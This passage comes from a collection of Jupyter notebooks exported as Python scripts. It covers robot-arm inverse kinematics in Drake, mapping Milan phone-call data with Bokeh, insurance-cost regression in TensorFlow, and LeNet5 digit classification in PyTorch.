plant.get_body(body_index),\n tf)\n simulator.set_target_realtime_rate(1.0)\n simulator.AdvanceTo(0.01)\n\n station_plant = station.get_multibody_plant()\n \n return simulator, station_plant\n\n\n# + id=\"d9b_FojtUQoP\"\ndef create_q_knots(pose_lst):\n \"\"\"Convert end-effector pose list to joint position list using series of \n InverseKinematics problems. Note that q is 9-dimensional because the last 2 dimensions \n contain gripper joints, but these should not matter to the constraints.\n @param: pose_lst (python list): post_lst[i] contains keyframe X_WG at index i.\n @return: q_knots (python_list): q_knots[i] contains IK solution that will give f(q_knots[i]) \\approx pose_lst[i].\n \"\"\"\n q_knots = []\n plant, _ = CreateIiwaControllerPlant()\n world_frame = plant.world_frame()\n gripper_frame = plant.GetFrameByName(\"body\")\n q_nominal = np.array([ 0., 0.6, 0., -1.75, 0., 1., 0., 0., 0.]) # nominal joint for joint-centering.\n\n def AddOrientationConstraint(ik, R_WG, bounds):\n \"\"\"Add orientation constraint to the ik problem. Implements an inequality \n constraint where the axis-angle difference between f_R(q) and R_WG must be\n within bounds. 
Can be translated to:\n ik.prog().AddBoundingBoxConstraint(angle_diff(f_R(q), R_WG), -bounds, bounds)\n \"\"\"\n ik.AddOrientationConstraint(\n frameAbar=world_frame, R_AbarA=R_WG, \n frameBbar=gripper_frame, R_BbarB=RotationMatrix(),\n theta_bound=bounds\n )\n\n def AddPositionConstraint(ik, p_WG_lower, p_WG_upper):\n \"\"\"Add position constraint to the ik problem. Implements an inequality\n constraint where f_p(q) must lie between p_WG_lower and p_WG_upper. Can be\n translated to \n ik.prog().AddBoundingBoxConstraint(f_p(q), p_WG_lower, p_WG_upper)\n \"\"\"\n ik.AddPositionConstraint(\n frameA=world_frame, frameB=gripper_frame, p_BQ=np.zeros(3),\n p_AQ_lower=p_WG_lower, p_AQ_upper=p_WG_upper)\n\n for i in range(len(pose_lst)):\n ik = inverse_kinematics.InverseKinematics(plant)\n q_variables = ik.q() # Get variables for MathematicalProgram\n prog = ik.prog() # Get MathematicalProgram\n\n #### Modify here ###############################\n des_pose = pose_lst[i]\n des_translation = des_pose.translation()\n des_rotation = des_pose.rotation()\n\n TEMP = q_nominal - q_variables\n prog.AddCost(TEMP.dot(TEMP)) # Joint centering cost\n\n if i == 0:\n init_guess = q_nominal\n else:\n init_guess = q_knots[-1]\n \n prog.SetInitialGuess(q_variables, init_guess)\n\n theta_bound = np.pi / 24\n t_bound = np.array([0, 0, .01])\n\n AddOrientationConstraint(ik, des_rotation, theta_bound)\n AddPositionConstraint(ik, des_translation - t_bound, des_translation + t_bound)\n\n ################################################\n \n result = Solve(prog)\n\n if not result.is_success():\n raise RuntimeError\n \n q_knots.append(result.GetSolution(q_variables))\n\n return q_knots\n\n\n# + id=\"tXpo5zh4PMqB\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"96aec6a3-6d93-4c20-e079-a3e7bbcfea10\"\nq_knots = np.array(create_q_knots(pose_lst))\nq_traj = PiecewisePolynomial.CubicShapePreserving(t_lst, q_knots[:, 0:7].T)\nsimulator, station_plant = BuildAndSimulateTrajectory(q_traj, g_traj)\n\n# + id=\"z5K2pFrWnGAt\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"d3294f9c-fdaf-46af-82fe-1c6ff2711d4f\"\nsimulator.AdvanceTo(0.1)\n# Uncomment and run the simulation to 12 seconds for results.\nsimulator.AdvanceTo(15.0)\n\n# + id=\"kL_h0-nna6QL\"\n\n","repo_name":"verityw/manipulation-final-project","sub_path":"PlaceUpright.ipynb","file_name":"PlaceUpright.ipynb","file_ext":"py","file_size_in_byte":21347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"28060501942","text":"import geojson\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nwith open(\"data/milano-grid.geojson\") as json_file:\n grid_json = geojson.load(json_file)\n\nwith open(\"data/Italian_provinces.geojson\") as json_file:\n provinces_json = geojson.load(json_file)\n\nfrom functools import reduce\nstart_day = 1\nend_day = 1 + 1\n\n# +\n# Milan to provinces\nm2p_df = []\nfor day in range(start_day, end_day):\n m2p_df.append(pd.read_csv(\"data/mi-to-provinces-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0))\n \nm2p_df = pd.concat(m2p_df)\n# -\n\ntime_indices = pd.concat([pd.DataFrame(np.repeat(m2p_df.index.drop_duplicates().values, 10000), columns=['datetime'])]).reset_index(drop=True)\ncell_indices = pd.concat([pd.DataFrame(np.arange(10000), columns=['Cell1D'])] * 24).reset_index(drop=True)\n\n# +\nnew_m2p_df = pd.concat([time_indices, cell_indices], axis=1)\nnew_m2p_df = new_m2p_df.set_index('datetime')\n\n# for index, 
row in m2p_df.iterrows():\n# new_m2p_df.loc[index].loc['Cell1D']\n\nnew_m2p_df.loc[index].loc['Cell1D']\n\n# +\n# Milan to countries\nm2c_df = []\nfor day in range(start_day, end_day):\n m2c_df.append(pd.read_csv(\"data/sms-call-internet-mi-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0))\n \nm2c_df = pd.concat(m2c_df)\n# -\n\nlen(set(m2c_df['countrycode']))\n\ndf = pd.merge(m2p_df, m2c_df, on=['CellID'])\n\ndf\n\n# +\n\nfrom collections import Counter\n\nfrom bokeh.io import show\nfrom bokeh.models import (\n ColumnDataSource,\n HoverTool,\n LogColorMapper\n)\nfrom bokeh.palettes import Viridis256 as palette\nfrom bokeh.plotting import figure\nfrom bokeh.layouts import column\n\nplots = []\nfor day in range(3,4):\n \n # Load data\n all_data = pd.read_csv(\"data/mi-to-provinces-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0)\n \n for hour in range(0, 8):\n data = all_data.loc['2013-11-{:02} {:02}:00:00'.format(day, hour)]\n\n calls_per_cell = data['CellID'].values\n calls_per_cell = Counter(calls_per_cell)\n print(day, hour, calls_per_cell.most_common(5))\n calls_per_cell = dict(calls_per_cell)\n \n for key, value in calls_per_cell.items():\n calls_per_cell[key] = value/100\n \n lon = [[coors[0] for coors in cell[\"geometry\"][\"coordinates\"][0]] for cell in grid_json['features']]\n lat = [[coors[1] for coors in cell[\"geometry\"][\"coordinates\"][0]] for cell in grid_json['features']]\n names = [cell[\"id\"] for cell in grid_json['features']]\n calls = [calls_per_cell[cell[\"id\"]+1] if cell[\"id\"]+1 in calls_per_cell else 0 for cell in grid_json['features']]\n calls[0] = 0.0\n calls[-1] = 1.0\n\n # def print_stats(x, y):\n # x = np.asarray(x)\n # y = np.asarray(y)\n # print(y.max(), x.max())\n # print(y.min(), x.min())\n # print((y.min() + y.max()) / 2, (x.min() + x.max()) / 2)\n # print_stats(lon, lat)\n\n color_mapper = LogColorMapper(palette=palette)\n TOOLS = \"pan,wheel_zoom,reset,hover,save\"\n\n source = ColumnDataSource(data=dict(\n lon=lon,\n lat=lat,\n names=names,\n calls=calls,\n center_lon=[np.mean(x) for x in lon],\n center_lat=[np.mean(x) for x in lat],\n ))\n\n p = figure(\n title=\"Italian Provinces by Number of Calls with Milan\", tools=TOOLS,\n x_axis_location=None, y_axis_location=None\n )\n p.grid.grid_line_color = None\n\n p.patches('lon', 'lat', source=source,\n fill_color={'field': 'calls', 'transform': color_mapper},\n fill_alpha=0.7, line_color=\"white\", line_width=0.5)\n\n hover = p.select_one(HoverTool)\n hover.point_policy = \"follow_mouse\"\n hover.tooltips = [\n (\"Name\", \"@names\"),\n (\"Calls)\", \"@calls\"),\n (\"(Lat, Lon)\", \"(@center_lat, @center_lon)\"),\n ]\n plots.append(p)\n# -\n\nshow(column(*plots))\n\nall_data.describe()\n\n# +\ndata = pd.read_csv(\"data/mi-to-provinces-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0)\n\ncalls_per_province = data['provinceName'].values\ncalls_per_province = Counter(calls_per_province)\n\nprint(calls_per_province.most_common(5))\n\ncalls_per_province = dict(calls_per_province)\n\nfor province in provinces_json['features']:\n province = province[\"properties\"][\"PROVINCIA\"].upper()\n if province not in calls_per_province:\n \n def replace_key(new_key, old_key):\n calls_per_province[new_key] = calls_per_province[old_key]\n del calls_per_province[old_key]\n \n replace_key(\"AOSTA\", \"VALLE D'AOSTA\")\n replace_key(\"BOLZANO\", \"BOLZANO/BOZEN\")\n replace_key(\"MASSA CARRARA\", \"MASSA-CARRARA\")\n \n if province not in calls_per_province:\n raise 
ValueError('{} is not in province list!'.format(province))\n\nlon = [[coors[0] for coors in province[\"geometry\"][\"coordinates\"][0][0]] for province in provinces_json['features']]\nlat = [[coors[1] for coors in province[\"geometry\"][\"coordinates\"][0][0]] for province in provinces_json['features']]\nnames = [province[\"properties\"][\"PROVINCIA\"] for province in provinces_json['features']]\ncalls = [calls_per_province[province[\"properties\"][\"PROVINCIA\"].upper()] for province in provinces_json['features']]\n\nsource = ColumnDataSource(data=dict(\n lon=lon,\n lat=lat,\n names=names,\n calls=calls,\n center_lon=[np.mean(x) for x in lon],\n center_lat=[np.mean(x) for x in lat],\n))\n\np = figure(\n title=\"Italian Provinces by Number of Calls with Milan\", tools=TOOLS,\n x_axis_location=None, y_axis_location=None\n)\np.grid.grid_line_color = None\n\np.patches('lon', 'lat', source=source,\n fill_color={'field': 'calls', 'transform': color_mapper},\n fill_alpha=0.7, line_color=\"white\", line_width=0.5)\n\nhover = p.select_one(HoverTool)\nhover.point_policy = \"follow_mouse\"\nhover.tooltips = [\n (\"Name\", \"@names\"),\n (\"Calls)\", \"@calls\"),\n (\"(Lat, Lon)\", \"(@center_lat, @center_lon)\"),\n]\n\nshow(p)\n# -\n\n\n\n\n","repo_name":"iancabral/milan_mobile_phone_activity","sub_path":"analysis.ipynb","file_name":"analysis.ipynb","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"38172889659","text":"# + id=\"T6hMh9BjJs4r\"\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 408} id=\"GJ01ATBvJ8BP\" outputId=\"400579dc-5d1b-4eb9-a0a3-e5de64017aeb\"\ninsurance = pd.read_csv(\"https://raw.githubusercontent.com/krish1407/Medical-Cost-Personal-Datasets/master/insurance.csv\")\ninsurance\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 428} id=\"OsyPRZVWKCa8\" outputId=\"2e0f0ee9-a9f8-454b-f067-324c7934597a\"\n# One hot encoding\ninsurance_one_hot = pd.get_dummies(insurance)\ninsurance_one_hot\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 428} id=\"rGOjBMZsL_X-\" outputId=\"43825ee2-1b49-4bad-fa93-e53730214003\"\nX = insurance_one_hot.drop(\"charges\",axis=1)\nX\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"2D-jxrgLMWud\" outputId=\"44c786c4-ef11-46a2-bbb8-e69da1947641\"\ny = insurance_one_hot[\"charges\"]\ny\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"-1graMxlMZOc\" outputId=\"c9883dee-5781-46e5-b69c-33597ca0d4c8\"\n# Creating training and test sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=42)\nX_train.shape, X_test.shape, y_train.shape, y_test.shape\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HX0Kh-TzNEFT\" outputId=\"c634c8a6-373a-4556-abd0-e6d6f6d6226a\"\n# Create a model for insurance data\n\ntf.random.set_seed(42)\n\ninsurance_model = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.SGD(),\n metrics = [\"mae\"]\n)\n\ninsurance_model.fit(X_train, y_train, epochs = 100)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"clEh7izqVZ3G\" outputId=\"a6748d16-7715-44a0-8c3e-ec126a3a4c5e\"\n# Check the results of the insurance model on 
the test data\ninsurance_model.evaluate(X_test, y_test)\n\n# + [markdown] id=\"kpNMYmiiWplg\"\n# We can see that our model has performed a bit well in training data(mae = 6880.6774) than the test data(mae = 7023.3291).\n#\n# We got an error of nearly 7000 rupees we will check whether that error is significant.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"i-HGyyCsWl0r\" outputId=\"31632401-7638-4bca-f1a6-2b5c499f68d2\"\ny_train.median(), y_train.mean()\n\n# + [markdown] id=\"l2SclTA1XQkp\"\n# The median is 9575 and the mean is 13346. But our error is 7023. Which is not at all acceptable. Since the error is more than 3/4th of the median nearly half of the mean. So we have to improve our model.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"s8znDh6sXI8S\" outputId=\"6b434c78-6704-4b57-a582-e05362fcb6ba\"\n# Improving the model\ntf.random.set_seed(42)\n\ninsurance_model = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model.fit(X_train, y_train, epochs = 100)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"9qk5PlTuX0pa\" outputId=\"91219192-d7fb-4acb-fc38-f0212a494009\"\ninsurance_model.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"grhI64upX67X\" outputId=\"b39562d5-decc-4469-c98a-19c631747654\"\ntf.random.set_seed(42)\n\ninsurance_model2 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model2.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model2.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"48EpNOYgcam3\" outputId=\"bd76544b-0eef-4ed8-8a26-b86d0365697d\"\ninsurance_model2.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"27AY3fgKYJly\" outputId=\"483ef5d7-5574-402d-d189-cceb3dee510a\"\ntf.random.set_seed(42)\n\ninsurance_model3 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model3.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.001),\n metrics = [\"mae\"]\n)\n\ninsurance_model3.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"vN1QVwD1cpLJ\" outputId=\"ac546cd1-d157-4206-fd12-ae7e6c70be15\"\ninsurance_model3.evaluate(X_test, y_test)\n\n# + [markdown] id=\"Mtpbb10LYo97\"\n# So far our best model is Adam(lr=0.01) with epochs = 500\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"FdolKQKsYv83\" outputId=\"7ecba0e4-0407-4ab0-bf59-90ceed1a3c83\"\ntf.random.set_seed(42)\n\ninsurance_model4 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model4.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model4.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"qEWKSUdvcxMo\" outputId=\"96c72d23-867b-43f9-9bd1-81283a61065d\"\ninsurance_model4.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"x0fzApadYzzn\" outputId=\"73c33793-61cd-4eef-aee4-f392ad5bb312\"\ntf.random.set_seed(42)\n\ninsurance_model5 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n 
tf.keras.layers.Dense(7),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model5.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model5.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"vHGlMzcFc_oH\" outputId=\"c27b3c77-08ee-4edf-b044-303eaea3983b\"\ninsurance_model5.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"pIQPGq1-ZCan\" outputId=\"9e8040cd-73e0-493f-ad58-0b5088d873e1\"\ntf.random.set_seed(42)\n\ninsurance_model6 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(7),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model6.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\nhistory = insurance_model6.fit(X_train, y_train, epochs = 1000)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HMF-JQa_dJIO\" outputId=\"259e516d-f156-4318-e368-a0cc7d7dbf98\"\ninsurance_model6.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 296} id=\"NG-x3SSeZRi3\" outputId=\"17a2bbc6-ae23-4077-a614-27845332fb3f\"\n# Plot history (also known as loss curve or a training curve)\npd.DataFrame(history.history).plot()\nplt.ylabel(\"loss\")\nplt.xlabel(\"epochs\")\n\n# + [markdown] id=\"OKvOh-Q1rhE2\"\n# With the above graph we can see how the value of loss varies with respect to epochs.\n#\n# An important question which needs to be answered here is for how long should we train the model. The answer is, it depends on the problem. For this kind of question tensorflow has given a solution.\n#\n# Early stopping callback -----> A tensoflow component which we can add to our model to improve a certain metric. Suppose we are training a model for 100 epochs and after a point say, 70 the loss function hasn't improved significantly for close to say 10 iterations. We stop the training at that point itself.\n\n# + [markdown] id=\"HQCjDC33vAuS\"\n# ### Preprocessing data - Standardisation and Normalisation\n# Neural networks tend to prefer Normalisation. It's enough to normalise only the input columns we dont have to normalise the output columns.\n# Our models converge faster when we apply normalisation. Eg: Suppose we get a loss of 1000 for 200 epochs in data which is not normalised. We will get the same loss of 1000 for 100 epochs itself, if we normalise the data. That is, the model converges faster. \n\n# + id=\"4vLW35-3poOb\"\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n# + id=\"wjn3_PTK1NhE\"\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\n\ninsurance = pd.read_csv(\"https://raw.githubusercontent.com/krish1407/Medical-Cost-Personal-Datasets/master/insurance.csv\")\ninsurance\n\n# Create a column transformer\nct = make_column_transformer(\n (MinMaxScaler(), [\"age\",\"bmi\",\"children\"]),\n (OneHotEncoder(handle_unknown=\"ignore\"), [\"sex\",\"smoker\",\"region\"])\n)\n\nX = insurance.drop(\"charges\",axis = 1)\ny = insurance[\"charges\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 42)\n\n# + [markdown] id=\"uj9Rs0XU4cGg\"\n# We fit the column transformer from the training data, and we use that fit to transform the test data. 
\n#\n# We can't do it the other way because test data is not seen by the model. \n\n# + id=\"MTIeDJzh5VQ3\"\n# Fit the column transformer to the training data\nct.fit(X_train)\n\n# Transform training and test data with normalisation (MinMaxScaler) and OneHotEncoding\nX_train_normal = ct.transform(X_train)\nX_test_normal = ct.transform(X_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"k_4U1UTj_Uf9\" outputId=\"4678af77-4aa9-41e2-869b-4a2acdd462d3\"\nX_train.loc[0]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"8P6IhwUo-57w\" outputId=\"4ea1e8db-0017-478e-f51f-3c93e16fbdf1\"\nX_train_normal[0]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"5CDX650Z_IXc\" outputId=\"6ad694b5-4ead-4e77-f7e6-5f9c8b51aaee\"\nX_train.shape, X_train_normal.shape\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"IYDPQ-Hy_sXQ\" outputId=\"ded422cd-1423-446d-ae11-4287eeb7b214\"\n# Construct the model with normalised data\n# So far our best model is insurance_model2 Adam(lr=0.01) with epochs = 500\n\ntf.random.set_seed(42)\n\ninsurance_model2_normalise = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model2_normalise.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model2_normalise.fit(X_train_normal, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"jhL3lK_QBIYK\" outputId=\"ae47129d-8fda-4fac-eccb-e4183d734133\"\n\ntf.random.set_seed(42)\n\ninsurance_model3_normalise = tf.keras.Sequential([\n tf.keras.layers.Dense(100),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model3_normalise.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model3_normalise.fit(X_train_normal, y_train, epochs = 500)\n","repo_name":"Prithivee7/Deep-Learning","sub_path":"Build_Tensors/DL_2_neural_network_regression_2.ipynb","file_name":"DL_2_neural_network_regression_2.ipynb","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"8574222546","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"qQtmoVU_56kp\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\nimport os\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, f1_score, accuracy_score\n\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.models import resnet18\nimport torch.nn as nn\nimport torch.optim as optim\n\n# + [markdown] id=\"5YA-ZWBF3xr1\"\n# #Charging data using kaggle API\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 69} id=\"6EHt2kla-xCi\" outputId=\"85dec63d-607f-4d0d-c693-bec90f98d5ff\"\nfrom google.colab import files\nfiles.upload()\n# !pip install -q kaggle\n# !mkdir -p ~/.kaggle\n# !cp kaggle.json ~/.kaggle/\n# !chmod 600 ~/.kaggle/kaggle.json\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"-WRv9bzT-9Pk\" outputId=\"2dfe1b13-20bf-452b-afc8-ffd2861890b2\"\n# !kaggle competitions download -c digit-recognizer\n# !unzip digit-recognizer.zip\n\n# + id=\"1hqAbyGl34J7\"\ndata = pd.read_csv(\"train.csv\")\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else 
\"cpu\")\n\n\n# + [markdown] id=\"XsH-w7JV4DWS\"\n# # Displaying the images before transformation\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 277} id=\"ljYu6JWX4DGh\" outputId=\"858382d4-9913-4526-d8d4-bc6b1bf17ea8\"\n\nfig, axes = plt.subplots(1, 5, figsize=(12, 6))\n\nfor i in range(5):\n index = random.randint(0, len(data))\n img_data = data.iloc[index, 1:].values.reshape(28, 28)\n ax = axes[i]\n ax.imshow(img_data, cmap='gray')\n ax.set_title(f\"Label: {data.iloc[index, 0]}\")\n\nplt.tight_layout()\nfig.subplots_adjust(top=2) \nfig.suptitle(\"Original Images\")\naxes[0].set_ylabel(\"Original\")\nplt.show()\n\n\n# + [markdown] id=\"kLPPa4Nx5ULr\"\n# # Displaying the images after transformation\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 277} id=\"l5LZLmtr-rhq\" outputId=\"90c9c58d-ba2a-4906-ce43-e01a849fe9d9\"\ntransform = transforms.Compose([\n transforms.ToTensor(), # Convert the input image to a PyTorch Tensor\n transforms.Lambda(lambda x: x.repeat(3, 1, 1)), # Create a 3-channel image for the ResNet18 model\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)) # Normalize the image \n])\n\nfig, axes = plt.subplots(1, 5, figsize=(12, 6))\n\nfor i in range(5):\n index = random.randint(0, len(data))\n img_data = data.iloc[index, 1:].values.reshape(28, 28)\n\n img_data = data.iloc[index, 1:].values.astype(np.float32).reshape(28, 28)\n transformed_img_data = transform(img_data).numpy().transpose(1, 2, 0)[:,:,0]\n ax = axes[i]\n ax.imshow(transformed_img_data, cmap='gray')\n ax.set_title(f\"Label: {data.iloc[index, 0]}\")\n\nplt.tight_layout()\nfig.subplots_adjust(top=2) \nfig.suptitle(\"Transformed Images\")\naxes[0].set_ylabel(\"Transformed\")\nplt.show()\n\n\n# + [markdown] id=\"lpUHaNRc6_Bb\"\n# #Defining MNIST Dataset Class.\n\n# + id=\"P7F-hpnknZh8\"\nclass MNISTDataset(Dataset):\n def __init__(self, data, transform=None, mode=\"train\"):\n self.data = data\n self.transform = transform\n self.mode = mode\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n if self.mode == \"train\": # If in train mode, get both image and label\n image = self.data.iloc[index, 1:].values.astype(np.float32).reshape(28, 28)\n label = self.data.iloc[index, 0]\n else: # If not in train mode, get only the image and set the label to -1\n image = self.data.iloc[index].values.astype(np.float32).reshape(28, 28)\n label = -1\n\n if self.transform:\n image = self.transform(image)\n\n return image, label\n\n\n# + [markdown] id=\"w7ajslqQ7hAP\"\n# #Creating Training and Validation Data Loaders\n\n# + id=\"9Octc40U7dYP\"\ntrain_data, val_data = train_test_split(data, test_size=0.2, random_state=0)\n\ntrain_dataset = MNISTDataset(train_data, transform)\nval_dataset = MNISTDataset(val_data, transform)\n\n# Shuffle the train loader to provide random batches during training, while keeping the validation loader in its original order\ntrain_loader = DataLoader(train_dataset, batch_size=100, shuffle=True)\nval_loader = DataLoader(val_dataset, batch_size=100, shuffle=False)\n\n\n# + [markdown] id=\"l9IVG5iI6fmr\"\n# # Implementing LeNet5\n# This implementation is based on the code found in the following GitHub repository: https://github.com/gradient-ai/LeNet5-Tutorial\n#\n\n# + id=\"StR9JDcc6Xnb\"\nclass LeNet5(nn.Module):\n def __init__(self, num_classes):\n super(LeNet5, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 6, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, 
stride=2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2))\n self.fc1 = nn.Linear(16 * 4 * 4, 120)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(120, 84)\n self.relu2 = nn.ReLU()\n self.fc3 = nn.Linear(84, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n out = self.relu2(out)\n out = self.fc3(out)\n return out\n\n\n\n# + [markdown] id=\"77XubSke6kXc\"\n# #Creating functions to train and compare the models\n\n# + id=\"BpulaRlWoJba\"\ndef train_model(model, dataloader, criterion, optimizer, device):\n model.train()\n running_loss = 0.0\n running_corrects = 0\n\n for inputs, labels in dataloader:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n outputs = model(inputs) # Pass the inputs through the model to get the output predictions\n _, preds = torch.max(outputs, 1) # Get the class with the highest predicted probability\n loss = criterion(outputs, labels) # Calculate the loss between the predicted output and the true labels\n\n loss.backward() # Perform backpropagation to calculate gradients\n optimizer.step() # Update the model parameters using the calculated gradients\n\n running_loss += loss.item() * inputs.size(0) # Accumulate the total loss\n running_corrects += torch.sum(preds == labels.data) # Accumulate the total number of correct predictions\n\n epoch_loss = running_loss / len(dataloader.dataset)\n epoch_acc = running_corrects.double() / len(dataloader.dataset)\n\n return epoch_loss, epoch_acc\n\n\n# + id=\"w6tqF3a8oKwy\"\ndef evaluate_model(model, dataloader, criterion, device):\n model.eval() # Set the model to evaluation mode, which turns off dropout and batch normalization layers\n\n # Initialize variables to keep track of the running loss and the number of correct predictions\n running_loss = 0.0\n running_corrects = 0\n\n with torch.no_grad(): # Turn off gradient calculations\n # Iterate over the dataset using the provided dataloader\n for inputs, labels in dataloader:\n # Move the input and target tensors to the specified device (CPU or GPU)\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs) # Compute the model's output for the given inputs\n\n _, preds = torch.max(outputs, 1) # Find the predicted class \n\n # Compute the loss between the model's prediction and the target labels\n loss = criterion(outputs, labels)\n\n # Accumulate the loss and the number of correct predictions for the batch\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n # Compute the average loss and accuracy for the entire dataset\n epoch_loss = running_loss / len(dataloader.dataset)\n epoch_acc = running_corrects.double() / len(dataloader.dataset)\n\n return epoch_loss, epoch_acc\n\n\n\n# + [markdown] id=\"e88Cda5q6qXz\"\n# # Training and comparing the models\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"gQAFQ5bqoN7G\" 